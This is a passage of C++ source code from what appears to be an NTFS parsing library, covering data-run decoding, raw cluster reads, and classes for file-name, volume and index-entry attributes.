*AttrHeaderNR;\n\tCDataRunList DataRunList;\n\nprivate:\n\tBOOL bDataRunOK;\n\tBYTE *UnalignedBuf;\t// Buffer to hold not cluster aligned data\n\tBOOL PickData(const BYTE **dataRun, LONGLONG *length, LONGLONG *LCNOffset);\n\tBOOL ParseDataRun();\n\tBOOL ReadClusters(void *buf, DWORD clusters, LONGLONG lcn);\n\tBOOL ReadVirtualClusters(ULONGLONG vcn, DWORD clusters,\n\t\tvoid *bufv, DWORD bufLen, DWORD *actural);\n\nprotected:\n\tvirtual __inline BOOL IsDataRunOK() const;\n\npublic:\n\tvirtual __inline ULONGLONG GetDataSize(ULONGLONG *allocSize = NULL) const;\n\tvirtual BOOL ReadData(const ULONGLONG &offset, void *bufv, DWORD bufLen, DWORD *actural) const;\n};\t// CAttrNonResident\n\nCAttrNonResident::CAttrNonResident(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : CAttrBase(ahc, fr)\n{\n\tAttrHeaderNR = (ATTR_HEADER_NON_RESIDENT*)ahc;\n\n\tUnalignedBuf = new BYTE[_ClusterSize];\n\n\tbDataRunOK = ParseDataRun();\n}\n\nCAttrNonResident::~CAttrNonResident()\n{\n\tdelete UnalignedBuf;\n\n\tDataRunList.RemoveAll();\n}\n\n// Parse a single DataRun unit\nBOOL CAttrNonResident::PickData(const BYTE **dataRun, LONGLONG *length, LONGLONG *LCNOffset)\n{\n\tBYTE size = **dataRun;\n\t(*dataRun)++;\n\tint lengthBytes = size & 0x0F;\n\tint offsetBytes = size >> 4;\n\n\tif (lengthBytes > 8 || offsetBytes > 8)\n\t{\n\t\tNTFS_TRACE1(\"DataRun decode error 1: 0x%02X\\n\", size);\n\t\treturn FALSE;\n\t}\n\n\t*length = 0;\n\tmemcpy(length, *dataRun, lengthBytes);\n\tif (*length < 0)\n\t{\n\t\tNTFS_TRACE1(\"DataRun length error: %I64d\\n\", *length);\n\t\treturn FALSE;\n\t}\n\n\t(*dataRun) += lengthBytes;\n\t*LCNOffset = 0;\n\tif (offsetBytes)\t// Not Sparse File\n\t{\n\t\tif ((*dataRun)[offsetBytes-1] & 0x80)\n\t\t\t*LCNOffset = -1;\n\t\tmemcpy(LCNOffset, *dataRun, offsetBytes);\n\n\t\t(*dataRun) += offsetBytes;\n\t}\n\n\treturn TRUE;\n}\n\n// Travers DataRun and insert into a link list\nBOOL CAttrNonResident::ParseDataRun()\n{\n\tNTFS_TRACE(\"Parsing Non Resident DataRun\\n\");\n\tNTFS_TRACE2(\"Start VCN = %I64u, End VCN = %I64u\\n\",\n\t\t\tAttrHeaderNR->StartVCN, AttrHeaderNR->LastVCN);\n\n\tconst BYTE *dataRun = (BYTE*)AttrHeaderNR + AttrHeaderNR->DataRunOffset;\n\tLONGLONG length;\n\tLONGLONG LCNOffset;\n\tLONGLONG LCN = 0;\n\tULONGLONG VCN = 0;\n\n\twhile (*dataRun)\n\t{\n\t\tif (PickData(&dataRun, &length, &LCNOffset))\n\t\t{\n\t\t\tLCN += LCNOffset;\n\t\t\tif (LCN < 0)\n\t\t\t{\n\t\t\t\tNTFS_TRACE(\"DataRun decode error 2\\n\");\n\t\t\t\treturn FALSE;\n\t\t\t}\n\n\t\t\tNTFS_TRACE2(\"Data length = %I64d clusters, LCN = %I64d\", length, LCN);\n\t\t\tNTFS_TRACE(LCNOffset == 0 ? \", Sparse Data\\n\" : \"\\n\");\n\n\t\t\t// Store LCN, Data size (clusters) into list\n\t\t\tDataRun_Entry *dr = new DataRun_Entry;\n\t\t\tdr->LCN = (LCNOffset == 0) ? -1 : LCN;\n\t\t\tdr->Clusters = length;\n\t\t\tdr->StartVCN = VCN;\n\t\t\tVCN += length;\n\t\t\tdr->LastVCN = VCN - 1;\n\n\t\t\tif (dr->LastVCN <= (AttrHeaderNR->LastVCN - AttrHeaderNR->StartVCN))\n\t\t\t{\n\t\t\t\tDataRunList.InsertEntry(dr);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tNTFS_TRACE(\"DataRun decode error: VCN exceeds bound\\n\");\n\n\t\t\t\t// Remove entries\n\t\t\t\tDataRunList.RemoveAll();\n\n\t\t\t\treturn FALSE;\n\t\t\t}\n\t\t}\n\t\telse\n\t\t\tbreak;\n\t}\n\n\treturn TRUE;\n}\n\n// Read clusters from disk, or sparse data\n// *actural = Clusters acturally read\nBOOL CAttrNonResident::ReadClusters(void *buf, DWORD clusters, LONGLONG lcn)\n{\n\tif (lcn == -1)\t// sparse data\n\t{\n\t\tNTFS_TRACE(\"Sparse Data, Fill the buffer with 0\\n\");\n\n\t\t// Fill the buffer with 0\n\t\tmemset(buf, 0, clusters * _ClusterSize);\n\n\t\treturn TRUE;\n\t}\n\n\tLARGE_INTEGER addr;\n\tDWORD len;\n\n\taddr.QuadPart = lcn * _ClusterSize;\n\tlen = SetFilePointer(_hVolume, addr.LowPart, &addr.HighPart, FILE_BEGIN);\n\n\tif (len == (DWORD)-1 && GetLastError() != NO_ERROR)\n\t{\n\t\tNTFS_TRACE1(\"Cannot locate cluster with LCN %I64d\\n\", lcn);\n\t}\n\telse\n\t{\n\t\tif (ReadFile(_hVolume, buf, clusters*_ClusterSize, &len, NULL) &&\n\t\t\tlen == clusters*_ClusterSize)\n\t\t{\n\t\t\tNTFS_TRACE2(\"Successfully read %u clusters from LCN %I64d\\n\", clusters, lcn);\n\t\t\treturn TRUE;\n\t\t}\n\t\telse\n\t\t{\n\t\t\tNTFS_TRACE1(\"Cannot read cluster with LCN %I64d\\n\", lcn);\n\t\t}\n\t}\n\n\treturn FALSE;\n}\n\n// Read Data, cluster based\n// clusterNo: Begnning cluster Number\n// clusters: Clusters to read\n// bufv, bufLen: Returned data\n// *actural = Number of bytes acturally read\nBOOL CAttrNonResident::ReadVirtualClusters(ULONGLONG vcn, DWORD clusters,\n\tvoid *bufv, DWORD bufLen, DWORD *actural)\n{\n\t_ASSERT(bufv);\n\t_ASSERT(clusters);\n\n\t*actural = 0;\n\tBYTE *buf = (BYTE*)bufv;\n\n\t// Verify if clusters exceeds DataRun bounds\n\tif (vcn + clusters > (AttrHeaderNR->LastVCN - AttrHeaderNR->StartVCN +1))\n\t{\n\t\tNTFS_TRACE(\"Cluster exceeds DataRun bounds\\n\");\n\t\treturn FALSE;\n\t}\n\n\t// Verify buffer size\n\tif (bufLen < clusters*_ClusterSize)\n\t{\n\t\tNTFS_TRACE(\"Buffer size too small\\n\");\n\t\treturn FALSE;\n\t}\n\n\t// Traverse the DataRun List to find the according LCN\n\tconst DataRun_Entry *dr = DataRunList.FindFirstEntry();\n\twhile(dr)\n\t{\n\t\tif (vcn>=dr->StartVCN && vcn<=dr->LastVCN)\n\t\t{\n\t\t\tDWORD clustersToRead;\n\n\t\t\tULONGLONG vcns = dr->LastVCN - vcn + 1;\t// Clusters from read pointer to the end\n\n\t\t\tif ((ULONGLONG)clusters > vcns)\t// Fragmented data, we must go on\n\t\t\t\tclustersToRead = (DWORD)vcns;\n\t\t\telse\n\t\t\t\tclustersToRead = clusters;\n\t\t\tif (ReadClusters(buf, clustersToRead, dr->LCN+(vcn-dr->StartVCN)))\n\t\t\t{\n\t\t\t\tbuf += clustersToRead*_ClusterSize;\n\t\t\t\tclusters -= clustersToRead;\n\t\t\t\t*actural += clustersToRead;\n\t\t\t\tvcn += clustersToRead;\n\t\t\t}\n\t\t\telse\n\t\t\t\tbreak;\n\n\t\t\tif (clusters == 0)\n\t\t\t\tbreak;\n\t\t}\n\n\t\tdr = DataRunList.FindNextEntry();\n\t}\n\n\t*actural *= _ClusterSize;\n\treturn TRUE;\n}\n\n// Judge if the DataRun is successfully parsed\n__inline BOOL CAttrNonResident::IsDataRunOK() const\n{\n\treturn bDataRunOK;\n}\n\n// Return Actural Data Size\n// *allocSize = Allocated Size\n__inline ULONGLONG CAttrNonResident::GetDataSize(ULONGLONG *allocSize) const\n{\n\tif (allocSize)\n\t\t*allocSize = AttrHeaderNR->AllocSize;\n\n\treturn AttrHeaderNR->RealSize;\n}\n\n// Read \"bufLen\" bytes from \"offset\" into \"bufv\"\n// Number of bytes acturally read is returned in \"*actural\"\nBOOL CAttrNonResident::ReadData(const ULONGLONG &offset, void *bufv, DWORD bufLen, DWORD *actural) const\n{\n\t// Hard disks can only be accessed by sectors\n\t// To be simple and efficient, only implemented cluster based accessing\n\t// So cluster unaligned data address should be processed carefully here\n\n\t_ASSERT(bufv);\n\n\t*actural = 0;\n\tif (bufLen == 0)\n\t\treturn TRUE;\n\n\t// Bounds check\n\tif (offset > AttrHeaderNR->RealSize)\n\t\treturn FALSE;\n\tif ((offset + bufLen) > AttrHeaderNR->RealSize)\n\t\tbufLen = (DWORD)(AttrHeaderNR->RealSize - offset);\n\n\tDWORD len;\n\tBYTE *buf = (BYTE*)bufv;\n\n\t// First cluster Number\n\tULONGLONG startVCN = offset / _ClusterSize;\n\t// Bytes in first cluster\n\tDWORD startBytes = _ClusterSize - (DWORD)(offset % _ClusterSize);\n\t// Read first cluster\n\tif (startBytes != _ClusterSize)\n\t{\n\t\t// First cluster, Unaligned\n\t\tif (((CAttrNonResident*)this)->ReadVirtualClusters(startVCN, 1, UnalignedBuf, _ClusterSize, &len)\n\t\t\t&& len == _ClusterSize)\n\t\t{\n\t\t\tlen = (startBytes < bufLen) ? startBytes : bufLen;\n\t\t\tmemcpy(buf, UnalignedBuf + _ClusterSize - startBytes, len);\n\t\t\tbuf += len;\n\t\t\tbufLen -= len;\n\t\t\t*actural += len;\n\t\t\tstartVCN++;\n\t\t}\n\t\telse\n\t\t\treturn FALSE;\n\t}\n\tif (bufLen == 0)\n\t\treturn TRUE;\n\n\tDWORD alignedClusters = bufLen / _ClusterSize;\n\tif (alignedClusters)\n\t{\n\t\t// Aligned clusters\n\t\tDWORD alignedSize = alignedClusters*_ClusterSize;\n\t\tif (((CAttrNonResident*)this)->ReadVirtualClusters(startVCN, alignedClusters, buf, alignedSize, &len)\n\t\t\t&& len == alignedSize)\n\t\t{\n\t\t\tstartVCN += alignedClusters;\n\t\t\tbuf += alignedSize;\n\t\t\tbufLen %= _ClusterSize;\n\t\t\t*actural += len;\n\n\t\t\tif (bufLen == 0)\n\t\t\t\treturn TRUE;\n\t\t}\n\t\telse\n\t\t\treturn FALSE;\n\t}\n\n\t// Last cluster, Unaligned\n\tif (((CAttrNonResident*)this)->ReadVirtualClusters(startVCN, 1, UnalignedBuf, _ClusterSize, &len)\n\t\t&& len == _ClusterSize)\n\t{\n\t\tmemcpy(buf, UnalignedBuf, bufLen);\n\t\t*actural += bufLen;\n\n\t\treturn TRUE;\n\t}\n\telse\n\t\treturn FALSE;\n}\n\n\n///////////////////////////////////\n// Attribute: Standard Information\n///////////////////////////////////\nclass CAttr_StdInfo : public CAttrResident\n{\npublic:\n\tCAttr_StdInfo(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr);\n\tvirtual ~CAttr_StdInfo();\n\nprivate:\n\tconst ATTR_STANDARD_INFORMATION *StdInfo;\n\npublic:\n\tvoid GetFileTime(FILETIME *writeTm, FILETIME *createTm = NULL, FILETIME *accessTm = NULL) const;\n\t__inline DWORD GetFilePermission() const;\n\t__inline BOOL IsReadOnly() const;\n\t__inline BOOL IsHidden() const;\n\t__inline BOOL IsSystem() const;\n\t__inline BOOL IsCompressed() const;\n\t__inline BOOL IsEncrypted() const;\n\t__inline BOOL IsSparse() const;\n\n\tstatic void UTC2Local(const ULONGLONG &ultm, FILETIME *lftm);\n};\t// CAttr_StdInfo\n\nCAttr_StdInfo::CAttr_StdInfo(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : CAttrResident(ahc, fr)\n{\n\tNTFS_TRACE(\"Attribute: Standard Information\\n\");\n\n\tStdInfo = (ATTR_STANDARD_INFORMATION*)AttrBody;\n}\n\nCAttr_StdInfo::~CAttr_StdInfo()\n{\n\tNTFS_TRACE(\"CAttr_StdInfo deleted\\n\");\n}\n\n// Change from UTC time to local time\nvoid CAttr_StdInfo::GetFileTime(FILETIME *writeTm, FILETIME *createTm, FILETIME *accessTm) const\n{\n\tUTC2Local(StdInfo->AlterTime, writeTm);\n\n\tif (createTm)\n\t\tUTC2Local(StdInfo->CreateTime, createTm);\n\n\tif (accessTm)\n\t\tUTC2Local(StdInfo->ReadTime, accessTm);\n}\n\n__inline DWORD CAttr_StdInfo::GetFilePermission() const\n{\n\treturn StdInfo->Permission;\n}\n\n__inline BOOL CAttr_StdInfo::IsReadOnly() const\n{\n\treturn ((StdInfo->Permission) & ATTR_STDINFO_PERMISSION_READONLY);\n}\n\n__inline BOOL CAttr_StdInfo::IsHidden() const\n{\n\treturn ((StdInfo->Permission) & ATTR_STDINFO_PERMISSION_HIDDEN);\n}\n\n__inline BOOL CAttr_StdInfo::IsSystem() const\n{\n\treturn ((StdInfo->Permission) & ATTR_STDINFO_PERMISSION_SYSTEM);\n}\n\n__inline BOOL CAttr_StdInfo::IsCompressed() const\n{\n\treturn ((StdInfo->Permission) & ATTR_STDINFO_PERMISSION_COMPRESSED);\n}\n\n__inline BOOL CAttr_StdInfo::IsEncrypted() const\n{\n\treturn ((StdInfo->Permission) & ATTR_STDINFO_PERMISSION_ENCRYPTED);\n}\n\n__inline BOOL CAttr_StdInfo::IsSparse() const\n{\n\treturn ((StdInfo->Permission) & ATTR_STDINFO_PERMISSION_SPARSE);\n}\n\n// UTC filetime to Local filetime\nvoid CAttr_StdInfo::UTC2Local(const ULONGLONG &ultm, FILETIME *lftm)\n{\n\tLARGE_INTEGER fti;\n\tFILETIME ftt;\n\n\tfti.QuadPart = ultm;\n\tftt.dwHighDateTime = fti.HighPart;\n\tftt.dwLowDateTime = fti.LowPart;\n\n\tif (!FileTimeToLocalFileTime(&ftt, lftm))\n\t\t*lftm = ftt;\n}\n\n\n////////////////////////////////////////\n// FileName helper class\n// used by FileName and IndexEntry\n////////////////////////////////////////\nclass CFileName\n{\npublic:\n\tCFileName(ATTR_FILE_NAME *fn = NULL);\n\tvirtual ~CFileName();\n\nprotected:\n\tconst ATTR_FILE_NAME *FileName;\t// May be NULL for an IndexEntry\n\twchar_t *FileNameWUC;\t// Uppercase Unicode File Name, used to compare file names\n\tint FileNameLength;\n\tBOOL IsCopy;\n\n\t__inline void SetFileName(ATTR_FILE_NAME *fn);\n\tvoid CFileName::CopyFileName(const CFileName *fn, const ATTR_FILE_NAME *afn);\n\nprivate:\n\tvoid GetFileNameWUC();\n\npublic:\n\tint Compare(const wchar_t *fn) const;\n\tint Compare(const char *fn) const;\n\n\t__inline ULONGLONG GetFileSize() const;\n\t__inline DWORD GetFilePermission() const;\n\t__inline BOOL IsReadOnly() const;\n\t__inline BOOL IsHidden() const;\n\t__inline BOOL IsSystem() const;\n\t__inline BOOL IsDirectory() const;\n\t__inline BOOL IsCompressed() const;\n\t__inline BOOL IsEncrypted() const;\n\t__inline BOOL IsSparse() const;\n\n\tint GetFileName(char *buf, DWORD bufLen) const;\n\tint GetFileName(wchar_t *buf, DWORD bufLen) const;\n\t__inline BOOL HasName() const;\n\t__inline BOOL IsWin32Name() const;\n\n\tvoid GetFileTime(FILETIME *writeTm, FILETIME *createTm = NULL, FILETIME *accessTm = NULL) const;\n};\t// CFileName\n\nCFileName::CFileName(ATTR_FILE_NAME *fn)\n{\n\tIsCopy = FALSE;\n\n\tFileName = fn;\n\n\tFileNameWUC = NULL;\n\tFileNameLength = 0;\n\n\tif (fn)\n\t\tGetFileNameWUC();\n}\n\nCFileName::~CFileName()\n{\n\tif (FileNameWUC)\n\t\tdelete FileNameWUC;\n}\n\n__inline void CFileName::SetFileName(ATTR_FILE_NAME *fn)\n{\n\tFileName = fn;\n\n\tGetFileNameWUC();\n}\n\n// Copy pointer buffers\nvoid CFileName::CopyFileName(const CFileName *fn, const ATTR_FILE_NAME *afn)\n{\n\tif (!IsCopy)\n\t{\n\t\tNTFS_TRACE(\"Cannot call this routine\\n\");\n\t\treturn;\n\t}\n\n\t_ASSERT(fn && afn);\n\n\tNTFS_TRACE(\"FileName Copied\\n\");\n\n\tif (FileNameWUC)\n\t\tdelete FileNameWUC;\n\n\tFileNameLength = fn->FileNameLength;\n\tFileName = afn;\n\n\tif (fn->FileNameWUC)\n\t{\n\t\tFileNameWUC = new wchar_t[FileNameLength+1];\n\t\twcsncpy(FileNameWUC, fn->FileNameWUC, FileNameLength);\n\t\tFileNameWUC[FileNameLength] = wchar_t('\\0');\n\t}\n\telse\n\t\tFileNameWUC = NULL;\n}\n\n// Get uppercase unicode filename and store it in a buffer\nvoid CFileName::GetFileNameWUC()\n{\n#ifdef\t_DEBUG\n\tchar fna[MAX_PATH];\n\tGetFileName(fna, MAX_PATH);\t// Just show filename in debug window\n#endif\n\n\tif (FileNameWUC)\n\t{\n\t\tdelete FileNameWUC;\n\t\tFileNameWUC = NULL;\n\t\tFileNameLength = 0;\n\t}\n\n\twchar_t fns[MAX_PATH];\n\tFileNameLength = GetFileName(fns, MAX_PATH);\n\n\tif (FileNameLength > 0)\n\t{\n\t\tFileNameWUC = new wchar_t[FileNameLength+1];\n\t\tfor (int i=0; i<FileNameLength; i++)\n\t\t\tFileNameWUC[i] = towupper(fns[i]);\n\t\tFileNameWUC[FileNameLength] = wchar_t('\\0');\n\t}\n\telse\n\t{\n\t\tFileNameLength = 0;\n\t\tFileNameWUC = NULL;\n\t}\n}\n\n// Compare Unicode file name\nint CFileName::Compare(const wchar_t *fn) const\n{\n\t// Change fn to upper case\n\tint len = wcslen(fn);\n\tif (len > MAX_PATH)\n\t\treturn 1;\t// Assume bigger\n\n\twchar_t fns[MAX_PATH];\n\n\tfor (int i=0; i<len; i++)\n\t\tfns[i] = towupper(fn[i]);\n\tfns[len] = wchar_t('\\0');\n\n\treturn wcscmp(fns, FileNameWUC);\n}\n\n// Compare ANSI file name\nint CFileName::Compare(const char *fn) const\n{\n\twchar_t fnw[MAX_PATH];\n\n\tint len = MultiByteToWideChar(CP_ACP, 0, fn, -1, fnw, MAX_PATH);\n\tif (len)\n\t\treturn Compare(fnw);\n\telse\n\t\treturn 1;\t// Assume bigger\n}\n\n__inline ULONGLONG CFileName::GetFileSize() const\n{\n\treturn FileName ? FileName->RealSize : 0;\n}\n\n__inline DWORD CFileName::GetFilePermission() const\n{\n\treturn FileName ? FileName->Flags : 0;\n}\n\n__inline BOOL CFileName::IsReadOnly() const\n{\n\treturn FileName ? ((FileName->Flags) & ATTR_FILENAME_FLAG_READONLY) : FALSE;\n}\n\n__inline BOOL CFileName::IsHidden() const\n{\n\treturn FileName ? ((FileName->Flags) & ATTR_FILENAME_FLAG_HIDDEN) : FALSE;\n}\n\n__inline BOOL CFileName::IsSystem() const\n{\n\treturn FileName ? ((FileName->Flags) & ATTR_FILENAME_FLAG_SYSTEM) : FALSE;\n}\n\n__inline BOOL CFileName::IsDirectory() const\n{\n\treturn FileName ? ((FileName->Flags) & ATTR_FILENAME_FLAG_DIRECTORY) : FALSE;\n}\n\n__inline BOOL CFileName::IsCompressed() const\n{\n\treturn FileName ? ((FileName->Flags) & ATTR_FILENAME_FLAG_COMPRESSED) : FALSE;\n}\n\n__inline BOOL CFileName::IsEncrypted() const\n{\n\treturn FileName ? ((FileName->Flags) & ATTR_FILENAME_FLAG_ENCRYPTED) : FALSE;\n}\n\n__inline BOOL CFileName::IsSparse() const\n{\n\treturn FileName ? ((FileName->Flags) & ATTR_FILENAME_FLAG_SPARSE) : FALSE;\n}\n\n// Get ANSI File Name\n// Return 0: Unnamed, <0: buffer too small, -buffersize, >0 Name length\nint CFileName::GetFileName(char *buf, DWORD bufLen) const\n{\n\tif (FileName == NULL)\n\t\treturn 0;\n\n\tint len = 0;\n\n\tif (FileName->NameLength)\n\t{\n\t\tif (bufLen < FileName->NameLength)\n\t\t\treturn -1*FileName->NameLength;\t// buffer too small\n\n\t\tlen = WideCharToMultiByte(CP_ACP, 0, (wchar_t*)FileName->Name, FileName->NameLength,\n\t\t\t\tbuf, bufLen, NULL, NULL);\n\t\tif (len)\n\t\t{\n\t\t\tbuf[len] = '\\0';\n\t\t\tNTFS_TRACE1(\"File Name: %s\\n\", buf);\n\t\t\tNTFS_TRACE4(\"File Permission: %s\\t%c%c%c\\n\", IsDirectory()?\"Directory\":\"File\",\n\t\t\t\tIsReadOnly()?'R':' ', IsHidden()?'H':' ', IsSystem()?'S':' ');\n\t\t}\n\t\telse\n\t\t{\n\t\t\tNTFS_TRACE(\"Unrecognized File Name or FileName buffer too small\\n\");\n\t\t}\n\t}\n\n\treturn len;\n}\n\n// Get Unicode File Name\n// Return 0: Unnamed, <0: buffer too small, -buffersize, >0 Name length\nint CFileName::GetFileName(wchar_t *buf, DWORD bufLen) const\n{\n\tif (FileName == NULL)\n\t\treturn 0;\n\n\tif (FileName->NameLength)\n\t{\n\t\tif (bufLen < FileName->NameLength)\n\t\t\treturn -1*FileName->NameLength;\t// buffer too small\n\n\t\tbufLen = FileName->NameLength;\n\t\twcsncpy(buf, (wchar_t*)FileName->Name, bufLen);\n\t\tbuf[bufLen] = wchar_t('\\0');\n\n\t\treturn bufLen;\n\t}\n\n\treturn 0;\n}\n\n__inline BOOL CFileName::HasName() const\n{\n\treturn FileNameLength > 0;\n}\n\n__inline BOOL CFileName::IsWin32Name() const\n{\n\tif (FileName == NULL || FileNameLength <= 0)\n\t\treturn FALSE;\n\n\treturn (FileName->NameSpace != ATTR_FILENAME_NAMESPACE_DOS);\t// POSIX, WIN32, WIN32_DOS\n}\n\n// Change from UTC time to local time\nvoid CFileName::GetFileTime(FILETIME *writeTm, FILETIME *createTm, FILETIME *accessTm) const\n{\n\tCAttr_StdInfo::UTC2Local(FileName ? FileName->AlterTime : 0, writeTm);\n\n\tif (createTm)\n\t\tCAttr_StdInfo::UTC2Local(FileName ? FileName->CreateTime : 0, createTm);\n\n\tif (accessTm)\n\t\tCAttr_StdInfo::UTC2Local(FileName ? FileName->ReadTime : 0, accessTm);\n}\n\n\n////////////////////////////////\n// Attribute: File Name\n////////////////////////////////\nclass CAttr_FileName : public CAttrResident, public CFileName\n{\npublic:\n\tCAttr_FileName(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : CAttrResident(ahc, fr)\n\t{\n\t\tNTFS_TRACE(\"Attribute: File Name\\n\");\n\n\t\tSetFileName((ATTR_FILE_NAME*)AttrBody);\n\t}\n\n\tvirtual ~CAttr_FileName()\n\t{\n\t\tNTFS_TRACE(\"CAttr_FileName deleted\\n\");\n\t}\n\nprivate:\n\t// File permission and time in $FILE_NAME only updates when the filename changes\n\t// So hide these functions to prevent user from getting the error information\n\t// Standard Information and IndexEntry keeps the most recent file time and permission infomation\n\tvoid GetFileTime(FILETIME *writeTm, FILETIME *createTm = NULL, FILETIME *accessTm = NULL) const {}\n\t__inline DWORD GetFilePermission(){}\n\t__inline BOOL IsReadOnly() const {}\n\t__inline BOOL IsHidden() const {}\n\t__inline BOOL IsSystem() const {}\n\t__inline BOOL IsCompressed() const {}\n\t__inline BOOL IsEncrypted() const {}\n\t__inline BOOL IsSparse() const {}\n};\t// CAttr_FileName\n\n\n//////////////////////////////////\n// Attribute: Volume Information\n//////////////////////////////////\nclass CAttr_VolInfo : public CAttrResident\n{\npublic:\n\tCAttr_VolInfo(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : CAttrResident(ahc, fr)\n\t{\n\t\tNTFS_TRACE(\"Attribute: Volume Information\\n\");\n\n\t\tVolInfo = (ATTR_VOLUME_INFORMATION*)AttrBody;\n\t}\n\n\tvirtual ~CAttr_VolInfo()\n\t{\n\t\tNTFS_TRACE(\"CAttr_VolInfo deleted\\n\");\n\t}\n\nprivate:\n\tconst ATTR_VOLUME_INFORMATION *VolInfo;\n\npublic:\n\t// Get NTFS Volume Version\n\t__inline WORD GetVersion()\n\t{\n\t\treturn MAKEWORD(VolInfo->MinorVersion, VolInfo->MajorVersion);\n\t}\n}; // CAttr_VolInfo\n\n\n///////////////////////////\n// Attribute: Volume Name\n///////////////////////////\nclass CAttr_VolName : public CAttrResident\n{\npublic:\n\tCAttr_VolName(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : CAttrResident(ahc, fr)\n\t{\n\t\tNTFS_TRACE(\"Attribute: Volume Name\\n\");\n\n\t\tNameLength = AttrBodySize >> 1;\n\t\tVolNameU = new wchar_t[NameLength+1];\n\t\tVolNameA = new char[NameLength+1];\n\n\t\tmemcpy(VolNameU, AttrBody, AttrBodySize);\n\t\tVolNameU[NameLength] = wchar_t('\\0');\n\n\t\tint len = WideCharToMultiByte(CP_ACP, 0, VolNameU, NameLength,\n\t\t\tVolNameA, NameLength, NULL, NULL);\n\t\tVolNameA[NameLength] = '\\0';\n\t}\n\n\tvirtual ~CAttr_VolName()\n\t{\n\t\tNTFS_TRACE(\"CAttr_VolName deleted\\n\");\n\n\t\tdelete VolNameU;\n\t\tdelete VolNameA;\n\t}\n\nprivate:\n\twchar_t *VolNameU;\n\tchar *VolNameA;\n\tDWORD NameLength;\n\npublic:\n\t// Get NTFS Volume Unicode Name\n\t__inline int GetName(wchar_t *buf, DWORD len) const\n\t{\n\t\tif (len < NameLength)\n\t\t\treturn -1*NameLength;\t// buffer too small\n\n\t\twcsncpy(buf, VolNameU, NameLength+1);\n\t\treturn NameLength;\n\t}\n\n\t// ANSI Name\n\t__inline int GetName(char *buf, DWORD len) const\n\t{\n\t\tif (len < NameLength)\n\t\t\treturn -1*NameLength;\t// buffer too small\n\n\t\tstrncpy(buf, VolNameA, NameLength+1);\n\t\treturn NameLength;\n\t}\n}; // CAttr_VolInfo\n\n\n/////////////////////////////////////\n// Attribute: Data\n/////////////////////////////////////\ntemplate <class TYPE_RESIDENT>\nclass CAttr_Data : public TYPE_RESIDENT\n{\npublic:\n\tCAttr_Data(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : TYPE_RESIDENT(ahc, fr)\n\t{\n\t\tNTFS_TRACE1(\"Attribute: Data (%sResident)\\n\", IsNonResident() ? \"Non\" : \"\");\n\t}\n\n\tvirtual ~CAttr_Data()\n\t{\n\t\tNTFS_TRACE(\"CAttr_Data deleted\\n\");\n\t}\n};\t// CAttr_Data\n\n\n/////////////////////////////\n// Index Entry helper class\n/////////////////////////////\nclass CIndexEntry : public CFileName\n{\npublic:\n\tCIndexEntry()\n\t{\n\t\tNTFS_TRACE(\"Index Entry\\n\");\n\n\t\tIsDefault = TRUE;\n\n\t\tIndexEntry = NULL;\n\t\tSetFileName(NULL);\n\t}\n\n\tCIndexEntry(const INDEX_ENTRY *ie)\n\t{\n\t\tNTFS_TRACE(\"Index Entry\\n\");\n\n\t\tIsDefault = FALSE;\n\n\t\t_ASSERT(ie);\n\t\tIndexEntry = ie;\n\n\t\tif (IsSubNodePtr())\n\t\t{\n\t\t\tNTFS_TRACE(\"Points to sub-node\\n\");\n\t\t}\n\n\t\tif (ie->StreamSize)\n\t\t{\n\t\t\tSetFileName((ATTR_FILE_NAME*)(ie->Stream));\n\t\t}\n\t\telse\n\t\t{\n\t\t\tNTFS_TRACE(\"No FileName stream found\\n\");\n\t\t}\n\t}\n\n\tvirtual ~CIndexEntry()\n\t{\n\t\t// Never touch *IndexEntry here if IsCopy == FALSE !\n\t\t// As the memory have been deallocated by ~CIndexBlock()\n\n\t\tif (IsCopy && IndexEntry)\n\t\t\tdelete (void*)IndexEntry;\n\n\t\tNTFS_TRACE(\"CIndexEntry deleted\\n\");\n\t}\n\nprivate:\n\tBOOL IsDefault;\n\nprotected:\n\tconst INDEX_ENTRY *IndexEntry;\n\npublic:\n\t// Use with caution !\n\tCIndexEntry& operator = (const CIndexEntry &ieClass)\n\t{\n\t\tif (!IsDefault)\n\t\t{\n\t\t\tNTFS_TRACE(\"Cannot call this routine\\n\");\n\t\t\treturn *this;\n\t\t}\n\n\t\tNTFS_TRACE(\"Index Entry Copied\\n\");\n\n\t\tIsCopy = TRUE;\n\n\t\tif (IndexEntry)\n\t\t{\n\t\t\tdelete (void*)IndexEntry;\n\t\t\tIndexEntry = NULL;\n\t\t}\n\n\t\tconst INDEX_ENTRY *ie = ieClass.IndexEntry;\n\t\t_ASSERT(ie && (ie->Size > 0));\n\n\t\tIndexEntry = (INDEX_ENTRY*)new BYTE[ie->Size];\n\t\tmemcpy((void*)IndexEntry, ie, ie->Size);\n\t\tCopyFileName(&ieClass, (ATTR_FILE_NAME*)(IndexEntry->Stream));\n\n\t\treturn *this;\n\t}\n\n\t__inline ULONGLONG GetFileReference() const\n\t{\n\t\tif (IndexEntry)\n\t\t\treturn IndexEntry->FileReference & 0x0000FFFFFFFFFFFFUL;\n\t\telse\n\t\t\treturn (ULONGLONG)-1;\n\t}\n\n\t__inline BOOL IsSubNodePtr() const\n\t{\n\t\tif (IndexEntry)\n\t\t\treturn (IndexEntry->Flags & INDEX_ENTRY_FLAG_SUBNODE);\n\t\telse\n\t\t\treturn FALSE;\n\t}\n\n\t__inline ULONGLONG GetSubNodeVCN() const\n\t{\n\t\tif (IndexEntry)\n\t\t\treturn *(ULONGLONG*)((BYTE*)IndexEntry + IndexEntry->Size - 8);\n\t\telse\n\t\t\treturn (ULONGLONG)-1;\n\t}\n};\t// CIndexEntry\n\n\n///////////////////////////////\n// Index Block helper class\n///////////////////////////////\nclass CIndexBlock : public CIndexEntryList\n{\npublic:\n\tCIndexBlock()\n\t{\n\t\tNTFS_TRACE(\"Index Block\\n\");\n\n\t\tIndexBlock = NULL;\n\t}\n\n\tvirtual ~CIndexBlock()\n\t{\n\t\tNTFS_TRACE(\"IndexBlock deleted\\n\");\n\n\t\tif (IndexBlock)\n\t\t\tdelete IndexBlock;\n\t}\n\nprivate:\n\tINDEX_BLOCK *IndexBlock;\n\npublic:\n\tINDEX_BLOCK *AllocIndexBlock(DWORD 